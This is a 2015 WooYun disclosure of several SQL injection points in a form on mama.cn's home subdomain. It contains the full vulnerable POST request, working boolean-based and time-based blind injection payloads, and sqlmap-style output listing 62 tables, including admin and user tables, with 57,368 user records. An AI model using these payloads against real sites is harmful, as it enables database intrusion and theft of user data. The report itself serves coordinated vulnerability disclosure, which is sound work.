当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116080

漏洞标题:妈妈网某处多个注入点

相关厂商:妈妈网

漏洞作者: 路人甲

提交时间:2015-05-26 11:43

修复时间:2015-07-10 12:14

公开时间:2015-07-10 12:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向核心白帽子及相关领域专家公开
2015-06-15: 细节向普通白帽子公开
2015-06-25: 细节向实习白帽子公开
2015-07-10: 细节向公众公开

简要描述:

233

详细说明:

POST /index.php?a=PublishPromotion&d=sub&g=Building HTTP/1.1
Content-Length: 225
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: home.mama.cn
Cookie: ***********************8
Host: home.mama.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=e&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
这几个参数都存在问题

漏洞证明:

---
Parameter: address (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: address=e' RLIKE (SELECT (CASE WHEN (4469=4469) THEN 0x65 ELSE 0x28 END)) AND 'ZayY'='ZayY&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 OR time-based blind (heavy query)
Payload: address=e' OR 9394=BENCHMARK(5000000,MD5(0x50706954)) AND 'yQSd'='yQSd&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
Database: home
[62 tables]
+------------------------------+
| cj_column_pic |
| home_admin_user |
| home_art |
| home_art2 |
| home_art3 |
| home_art_20131025 |
| home_art_20131107 |
| home_art_pics |
| home_art_pics2 |
| home_art_pics3 |
| home_art_promotions |
| home_art_promotions1 |
| home_art_promotions_20131025 |
| home_art_promotions_20131030 |
| home_block_type |
| home_businessman |
| home_businessman_130802 |
| home_businessman_fee |
| home_businessman_log |
| home_businessman_mobile |
| home_businessman_type |
| home_casephoto |
| home_casephoto2 |
| home_casephoto_cj |
| home_channel |
| home_channel_art |
| home_channel_art_20131025 |
| home_collect |
| home_edit_block |
| home_edit_history |
| home_feedback |
| home_forum_thread |
| home_phone_message |
| home_phone_message_set |
| home_phone_pushtoken |
| home_phone_send |
| home_photopic |
| home_pic |
| home_pic2 |
| home_pic_130723 |
| home_pic_130725 |
| home_pic_cj |
| home_pic_cross_to_tc |
| home_region |
| home_send_block |
| home_send_item |
| home_send_item2 |
| home_sessions |
| home_short_message |
| home_short_message_feedback |
| home_short_message_log |
| home_sort |
| home_supermarket |
| home_supermarket_brand |
| home_tenders |
| home_tenders_company |
| home_tenders_jlog |
| home_tenders_log |
| home_tenders_materials |
| home_tenders_style |
| home_top_nav |
| home_user |
+------------------------------+
Database: home
+-----------+---------+
| Table | Entries |
+-----------+---------+
| home_user | 57368 |
+-----------+---------+

修复方案:

check

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-26 12:13

厂商回复:

谢谢

最新状态:

暂无